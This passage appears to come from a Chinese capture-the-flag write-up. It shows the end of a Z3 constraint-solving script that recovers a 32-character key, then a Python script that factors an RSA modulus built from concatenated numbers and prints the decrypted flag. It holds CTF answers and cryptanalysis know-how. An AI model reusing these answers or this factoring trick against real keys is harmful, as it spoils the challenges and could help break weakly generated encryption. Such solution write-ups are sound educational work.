    18612 * a27 + 54808 * a25 + 42491 * a23 + 16634 * a22 + 52361 * a21 + 6252 * a20 + 63445 * a18 + 57764 * a16 + 3991 * a15 + 61646 * a14 + 23244 * a10 + 29174 * a9 + 5707 * a6 + 63976 * a4 + 58731 * a2 + 15479 * a0 + 10453 * a1 - 9782 * a3 - 9166 * a5 - 21516 * a7 - 2689 * a8 - 47968 * a11 - 38843 * a12 - 13488 * a13 - 57649 * a17 - 487 * a19 - 30704 * a24 - 61218 * a26 - 32873 * a28 - 58677 * a29 - 2280 * a30 + 35233 * a31 == 26232118)
s.add(
    38132 * a30 + 58430 * a28 + 38392 * a27 + 29396 * a25 + 15688 * a24 + 28509 * a21 + 23301 * a17 + 56629 * a16 + 11252 * a14 + 28641 * a13 + 35504 * a12 + 41197 * a11 + 9520 * a4 + 50614 * a2 + 36368 * a0 - 30534 * a1 - 7805 * a3 - 60795 * a5 - 17511 * a6 - 34692 * a7 - 22139 * a8 - 49013 * a9 - 24672 * a10 - 22264 * a15 - 55578 * a18 - 61882 * a19 - 48469 * a20 - 8197 * a22 - 43020 * a23 - 36911 * a26 - 6762 * a29 + 56670 * a31 == -860377)
s.add(
    19958 * a29 + 35318 * a27 + 58305 * a24 + 55072 * a20 + 58300 * a16 + 16494 * a13 + 61205 * a9 + 8511 * a8 + 21876 * a6 + 1791 * a3 + 28247 * a2 + 3542 * a0 - 17533 * a1 - 44455 * a4 - 2748 * a5 - 38052 * a7 - 16528 * a10 - 4664 * a11 - 13326 * a12 - 52661 * a14 - 38860 * a15 - 60164 * a17 - 39975 * a18 - 19566 * a19 - 55251 * a21 - 8160 * a22 - 54674 * a23 - 29010 * a25 - 6627 * a26 - 15962 * a28 - 10549 * a30 - 8177 * a31 == -14482154)
s.add(
    15394 * a29 + 13827 * a28 + 47703 * a27 + 37204 * a26 + 8621 * a23 + 26034 * a20 + 38644 * a19 + 26883 * a18 + 31346 * a17 + 29853 * a15 + 2052 * a13 + 37617 * a8 + 35004 * a3 + 25124 * a2 + -7510 * a0 - 61303 * a1 - 34033 * a4 - 49161 * a5 - 6021 * a6 - 36125 * a7 - 10528 * a9 - 47741 * a10 - 45531 * a11 - 1546 * a12 - 59464 * a14 - 22656 * a16 - 24655 * a21 - 9816 * a22 - 22299 * a24 - 23745 * a25 - 23945 * a30 + 48741 * a31 == -17062269)
s.add(
    27496 * a29 + 8511 * a27 + 61644 * a26 + 35917 * a24 + 16432 * a21 + 53570 * a19 + 30949 * a18 + 56668 * a16 + 5395 * a15 + 47866 * a14 + 33349 * a12 + 41169 * a9 + 34746 * a6 + 39102 * a5 + 19310 * a0 + 1288 * a1 - 38840 * a2 - 49229 * a3 - 40618 * a4 - 41363 * a7 - 45367 * a8 - 21440 * a10 - 36535 * a11 - 43289 * a13 - 41392 * a17 - 40337 * a20 - 1430 * a22 - 28334 * a23 - 46487 * a25 - 42458 * a28 - 59664 * a30 + 64335 * a31 == 6695285)
s.add(
    41403 * a29 + 13806 * a27 + 26203 * a26 + 59304 * a24 + 56824 * a22 + 3954 * a21 + 33269 * a20 + 12986 * a16 + 60427 * a15 + 42087 * a14 + 30996 * a13 + 51835 * a11 + 53494 * a9 + 33384 * a8 + 41797 * a4 + 17974 * a3 + -18187 * a0 + 28981 * a1 - 53485 * a2 - 20458 * a5 - 8491 * a6 - 16831 * a7 - 31995 * a10 - 12109 * a12 - 51691 * a17 - 58925 * a18 - 40872 * a19 - 30202 * a23 - 30793 * a25 - 42110 * a28 - 1100 * a30 - 26194 * a31 == 16909859)
s.add(
    53536 * a29 + 47559 * a28 + 42732 * a24 + 34737 * a23 + 48156 * a22 + 15071 * a21 + 38175 * a18 + 12186 * a17 + 28859 * a16 + 19225 * a13 + 28950 * a11 + 19883 * a9 + 40590 * a7 + 44081 * a5 + 20386 * a4 + -40011 * a0 - 26232 * a1 - 4849 * a2 - 60564 * a3 - 50739 * a6 - 17237 * a8 - 35381 * a10 - 4203 * a12 - 50964 * a14 - 39946 * a15 - 22511 * a19 - 20539 * a20 - 60250 * a25 - 61430 * a26 - 11009 * a27 - 8879 * a30 + 46741 * a31 == -1622782)
s.add(
    5442 * a29 + 45907 * a28 + 7689 * a27 + 56136 * a25 + 20039 * a24 + 18672 * a23 + 41239 * a22 + 9871 * a20 + 34328 * a18 + 27387 * a17 + 41615 * a16 + 41961 * a13 + 50367 * a12 + 59350 * a8 + 29632 * a7 + 22126 * a6 + 61953 * a5 + 34932 * a4 + 3756 * a3 + -42653 * a0 + 43668 * a1 - 10988 * a2 - 48711 * a9 - 23958 * a10 - 33557 * a11 - 17831 * a14 - 4583 * a15 - 29750 * a19 - 49888 * a21 - 30956 * a26 - 41068 * a30 + 23514 * a31 == 33025495)
s.add(
    41909 * a26 + 24036 * a24 + 21760 * a22 + 50228 * a21 + 63177 * a19 + 6738 * a18 + 869 * a17 + 19553 * a15 + 53583 * a14 + 59508 * a13 + 15986 * a11 + 3678 * a5 + 10458 * a4 + 5179 * a3 + 38342 * a2 + -26968 * a0 - 23313 * a1 - 32333 * a6 - 43275 * a7 - 2423 * a8 - 60827 * a9 - 42621 * a10 - 27590 * a12 - 56307 * a16 - 30359 * a20 - 19919 * a23 - 18153 * a25 - 6931 * a27 - 5822 * a28 - 30949 * a29 - 16572 * a30 + 11920 * a31 == -10454601)
s.add(
    43819 * a29 + 54696 * a27 + 55323 * a24 + 63177 * a23 + 6747 * a22 + 31098 * a21 + 37870 * a18 + 55168 * a16 + 1703 * a15 + 64744 * a14 + 57567 * a12 + 35013 * a11 + 52295 * a10 + 46356 * a9 + 29760 * a7 + 4313 * a6 + 18877 * a5 + 8314 * a4 + 35980 * a2 + 8386 * a0 + 57646 * a1 - 4029 * a3 - 47059 * a8 - 25490 * a13 - 62526 * a17 - 63227 * a19 - 27315 * a20 - 23370 * a25 - 37329 * a26 - 6309 * a28 - 12433 * a30 + 8882 * a31 == 51177223)
s.add(
    17153 * a27 + 41549 * a26 + 28202 * a24 + 36806 * a23 + 12690 * a22 + 42821 * a20 + 39834 * a19 + 17994 * a17 + 32765 * a14 + 25687 * a10 + 33388 * a9 + 143 * a4 + 63776 * a0 + 8682 * a1 - 16324 * a2 - 20022 * a3 - 48973 * a5 - 57775 * a6 - 43820 * a7 - 41070 * a8 - 15669 * a11 - 6946 * a12 - 23187 * a13 - 46495 * a15 - 8395 * a16 - 27782 * a18 - 46043 * a21 - 15428 * a25 - 59010 * a28 - 49235 * a29 - 53666 * a30 + 28539 * a31 == -15479857)
s.check()
m = s.model()
s = []
s.append(chr(m[a0].as_long()))
s.append(chr(m[a1].as_long()))
s.append(chr(m[a2].as_long()))
s.append(chr(m[a3].as_long()))
s.append(chr(m[a4].as_long()))
s.append(chr(m[a5].as_long()))
s.append(chr(m[a6].as_long()))
s.append(chr(m[a7].as_long()))
s.append(chr(m[a8].as_long()))
s.append(chr(m[a9].as_long()))
s.append(chr(m[a10].as_long()))
s.append(chr(m[a11].as_long()))
s.append(chr(m[a12].as_long()))
s.append(chr(m[a13].as_long()))
s.append(chr(m[a14].as_long()))
s.append(chr(m[a15].as_long()))
s.append(chr(m[a16].as_long()))
s.append(chr(m[a17].as_long()))
s.append(chr(m[a18].as_long()))
s.append(chr(m[a19].as_long()))
s.append(chr(m[a20].as_long()))
s.append(chr(m[a21].as_long()))
s.append(chr(m[a22].as_long()))
s.append(chr(m[a23].as_long()))
s.append(chr(m[a24].as_long()))
s.append(chr(m[a25].as_long()))
s.append(chr(m[a26].as_long()))
s.append(chr(m[a27].as_long()))
s.append(chr(m[a28].as_long()))
s.append(chr(m[a29].as_long()))
s.append(chr(m[a30].as_long()))
s.append(chr(m[a31].as_long()))
# print bytes(s).decode()
a = ['c', 's', '2', '8', 'R', 't', 't', 'h', 'H', 'q', 's', 'b', 'u', 'f', 'o', 'j', 's', 'L', 'z', '7', 'y', 'g', '2',
     'D', 'Y', 'q', 'W', 'Q', 'E', 'E', 'c', 'Y']
for i in a:
    print "\b" + i,

# cs28RtthHqsbufojsLz7yg2DYqWQEEcY

Crypto

rsa1

说来也巧，上两周的福建省赛刚解过一次同类型的。

from Crypto.Util.number import *
import gmpy2

e = 65537

c = 16396023285324039009558195962852040868243807971027796599580351414803675753933120024077886501736987010658812435904022750269541456641256887079780585729054681025921699044139927086676479128232499416835051090240458236280851063589059069181638802191717911599940897797235038838827322737207584188123709413077535201099325099110746196702421778588988049442604655243604852727791349351291721230577933794627015369213339150586418524473465234375420448340981330049205933291705601563283196409846408465061438001010141891397738066420524119638524908958331406698679544896351376594583883601612086738834989175070317781690217164773657939589691476539613343289431727103692899002758373929815089904574190511978680084831183328681104467553713888762965976896013404518316128288520016934828176674482545660323358594211794461624622116836
n = 21173064304574950843737446409192091844410858354407853391518219828585809575546480463980354529412530785625473800210661276075473243912578032636845746866907991400822100939309254988798139819074875464612813385347487571449985243023886473371811269444618192595245380064162413031254981146354667983890607067651694310528489568882179752700069248266341927980053359911075295668342299406306747805925686573419756406095039162847475158920069325898899318222396609393685237607183668014820188522330005608037386873926432131081161531088656666402464062741934007562757339219055643198715643442608910351994872740343566582808831066736088527333762011263273533065540484105964087424030617602336598479611569611018708530024591023015267812545697478378348866840434551477126856261767535209092047810194387033643274333303926423370062572301

a_front = str(n)[:200]
a_after = str(n)[-200:]
a_center = str(n)[200:-200]

a2_b2 = int("1" + a_center) - int(a_after + a_front) + 1
ab = int(str(int(a_front) - 1) + a_after)

a_plus_b = gmpy2.iroot(a2_b2 + 2 * ab, 2)
a_reduce_b = gmpy2.iroot(a2_b2 - 2 * ab, 2)
# print a_plus_b, a_reduce_b

a_plus_b = 106838564591144305676926782070047912332321708552599459433421988005590173618301409441680963131339125642947008343458604585435014375496821988389947672305582602421970993398746844212869008998505794666381010
a_reduce_b = 54270186678010731553949991319969930487691255406327041359307445729571793416734930873100299986170777117022211293344445720881101722862892913267074929159777144041266065578072445135827424558087738564056836

a = (a_plus_b + a_reduce_b) // 2
b = a_plus_b - a
# print a
# print b

p = int(str(a) + str(b))
q = int(str(b) + str(a))
f = (p - 1) * (q - 1)
d = gmpy2.invert(e, f)
flag = pow(c, d, n)
print long_to_bytes(flag)

# flag{637c3dda0a943c9e837ede64cba71cbcf8e0be7bb1ca9ea1de8b9aa589ce703f}